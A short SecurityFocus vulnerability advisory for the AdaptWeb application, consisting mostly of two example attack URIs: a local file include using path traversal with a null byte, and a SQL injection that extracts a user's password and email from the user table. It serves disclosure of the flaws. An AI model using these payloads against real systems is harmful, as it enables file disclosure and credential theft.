AdaptWeb Local File Include and SQL Injection Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

Local file include:
http://www.example.com/[path]/index.php?newlang=../../../../../../BOOTSECT.BAK%00

SQL injection:
http://www.example.com/[path]/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1


 

Privacy Statement
Copyright 2010, SecurityFocus